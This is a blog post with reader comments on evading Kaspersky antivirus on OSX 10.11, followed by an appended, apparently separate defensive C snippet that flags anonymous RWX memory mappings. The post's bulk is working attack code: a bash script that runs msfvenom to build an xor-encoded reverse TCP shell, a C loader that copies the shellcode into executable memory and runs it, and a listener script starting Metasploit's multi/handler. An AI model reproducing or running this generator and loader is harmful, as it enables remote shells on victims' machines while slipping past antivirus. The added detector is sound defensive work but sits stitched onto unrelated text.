Bypassing antivirus on OSX 10.11 with Metasploit – Kaspersky

Next in line for the tests is Kaspersky. (There has lately been some political turmoil about them, which is kind of childish: the US accusing Russia of spying ..haha .. these two countries have spied on each other for decades … yawn)

There is no free version, so we are stuck with a trial which you can download from https://usa.kaspersky.com/mac-security

TL;DR: we can get the same code executed just fine, as with Avast, using our custom payload from https://astr0baby.wordpress.com/2017/07/13/bypassing-antivirus-on-osx-10-11-with-metasploit-avast/. I was curious about the Network Attack Blocker function on OSX, as I remember that this feature was quite good on Windows at blocking certain meterpreter operations.

Kaspersky detects all EICAR and standard msfvenom generated stuff as well as the JAR payloads.

So again we try the custom source code template and the shellcode, as shown here.

Here is a generator for the above to make life easier .. OSX-x64-payload-generator.sh

#!/bin/bash
clear
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For OSX 64bit Antivirus bypass (Avast) "
echo "************************************************************"
echo -e "What IP are we gonna use ? \c"
read IP
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo '[*] Checking if metasploit msfvenom is present..'
if [ -x ./msfvenom ]; then
    echo '[*] Found msfvenom in current path ........ good'
else
    echo '[-] No msfvenom in path...make sure you have this script in your metasploit-framework path'
    exit 0
fi
echo '[*] Cleaning up '
rm -f osx64-payload.c
# msfvenom writes the xor-encoded shellcode to test.c as a C array named buf
./msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST="$IP" LPORT="$port" -a x64 --platform OSX -e x64/xor -f c -o test.c
# Assemble the C source: headers, then buf[] from msfvenom, then main()
cat > temp.c <<'EOF'
#include <stdio.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <string.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <strings.h>
#include <poll.h>
#include <pthread.h>
#include <stdint.h>

EOF
cat test.c >> temp.c
# main(): map one anonymous RWX page, copy buf into it and jump to it
cat >> temp.c <<'EOF'

int main(int argc, char **argv)
{
    void *ptr = mmap(0, 0x1000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);
    printf("ret: %p\n", ptr);
    memcpy(ptr, buf, sizeof buf);
    void (*fp)() = (void (*)())ptr;
    fp();
}
EOF
mv temp.c osx64-payload.c
if [ -f ./osx64-payload.c ]; then
    echo '[*] osx64-payload.c generated ...'
    ls -la osx64-payload.c
else
    echo '[-] Something went wrong .. '
    exit 0
fi

And the listener LISTENER-MAC-LATEST.sh

#!/bin/bash
clear
echo "***************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For Automatic Teensy programming and deployment "
echo "***************************************************************"
echo -e "What IP are we gonna listen to ? \c"
read host
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo "Starting the meterpreter listener.."
# Write a one-line wrapper that starts msfconsole with the multi/handler set up
echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD osx/x64/shell_reverse_tcp ; set LHOST ' > run.listener.sh
echo -n "$host" >> run.listener.sh
echo -n '; set LPORT ' >> run.listener.sh
echo -n "$port" >> run.listener.sh
echo -n '; run"' >> run.listener.sh
chmod +x run.listener.sh
./run.listener.sh

Here we have some screenshots of compilation and execution of the custom Metasploit payload on OSX with Kaspersky.

That's all for now :)


6 Responses to Bypassing antivirus on OSX 10.11 with Metasploit – Kaspersky

  1. Hey!
    I just wonder, is the following piece of code crucial for bypassing AV?
    void *ptr = mmap(0, 0x1000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);
    If yes, can you please tell me how this works? Thanks

    • astr0baby says:

      It's self-explanatory – we are setting up a memory segment with RWX flags; once the session gets initiated the payload gets pushed to memory from the metasploit server

      • So I seem to get this.
        This piece of code is equivalent to the following line:
        void *ptr = mmap(0, sizeof(shellcode),PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
        memcpy(ptr, shellcode, sizeof(shellcode));
        Where the file descriptor is ignored with the -1 handle, and a specific memory address is assigned for the shellcode.
        And the advantage of this method toward the traditional one below:
        int (*execute)() = (int (*)())shellcode;
        execute();
        Is that the shellcode is injected into a private, anonymous memory section and is thus harder to discover..?

      • astr0baby says:

        MAP_ANONYMOUS + MAP_PRIVATE:

        every call creates a distinct mapping
        children inherit the parent's mappings
        children's writes to the inherited mapping are handled in a copy-on-write manner
        the main purpose of using this kind of mapping is to allocate new zeroized memory
        malloc employs anonymous private mappings to serve memory allocation requests larger than MMAP_THRESHOLD bytes.
        typically, MMAP_THRESHOLD is 128kB.

  2. Just another question. Are the file inclusions at the beginning related to bypassing av as well?
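As an added example (not code from the original post or from Metasploit), the following C program shows the defensive side of the mmap call discussed in the template above and in the comments: an anonymous, private mapping that is readable, writable and executable at the same time is exactly what such a loader leaves behind, and it is something an endpoint monitor can flag. The scanner parses Linux /proc/<pid>/maps-style lines, constructed here for the example (on macOS the same information comes from vmmap or mach_vm_region, not from this format); is_anon_rwx, count_anon_rwx and the sample lines are names I chose.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: returns 1 when one maps-format line describes a
 * mapping that is rwx and not backed by a file, i.e. the kind of region
 * mmap(PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANON|MAP_PRIVATE) creates.
 * Malformed lines and any other mapping return 0. */
int is_anon_rwx(const char *line)
{
    char range[64], perms[8], offset[16], dev[16], inode[32], path[256];
    int n = sscanf(line, "%63s %7s %15s %15s %31s %255s",
                   range, perms, offset, dev, inode, path);
    if (n < 5)
        return 0;                                   /* not a maps line */
    if (strlen(perms) < 3 || perms[0] != 'r' || perms[1] != 'w' || perms[2] != 'x')
        return 0;                                   /* not rwx */
    if (n == 5)
        return 1;                                   /* no path: anonymous */
    return path[0] == '[';                          /* [heap], [stack], [anon:..] */
}

/* Count anonymous rwx mappings across a set of maps lines. */
int count_anon_rwx(const char *const *lines, size_t count)
{
    int hits = 0;
    for (size_t i = 0; i < count; i++)
        hits += is_anon_rwx(lines[i]);
    return hits;
}

/* Constructed sample: a normal text segment, two ordinary rw anonymous
 * regions, and one rwx anonymous page like the one the template allocates. */
static const char *const SAMPLE_MAPS[] = {
    "00400000-00401000 r-xp 00000000 08:01 1234 /usr/bin/true",
    "7f3a2c001000-7f3a2c003000 rw-p 00000000 00:00 0",
    "7f3a2c000000-7f3a2c001000 rwxp 00000000 00:00 0",
    "7ffd0000000-7ffd0021000 rw-p 00000000 00:00 0 [stack]",
};
#define SAMPLE_MAPS_LEN (sizeof SAMPLE_MAPS / sizeof SAMPLE_MAPS[0])

int main(void)
{
    for (size_t i = 0; i < SAMPLE_MAPS_LEN; i++)
        if (is_anon_rwx(SAMPLE_MAPS[i]))
            printf("suspicious rwx anonymous mapping: %s\n", SAMPLE_MAPS[i]);
    printf("%d flagged\n", count_anon_rwx(SAMPLE_MAPS, SAMPLE_MAPS_LEN));
    return 0;
}
```

A file-backed rwx mapping is deliberately not flagged here, so it stays a narrow check for the pattern this post uses rather than a general W^X audit.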
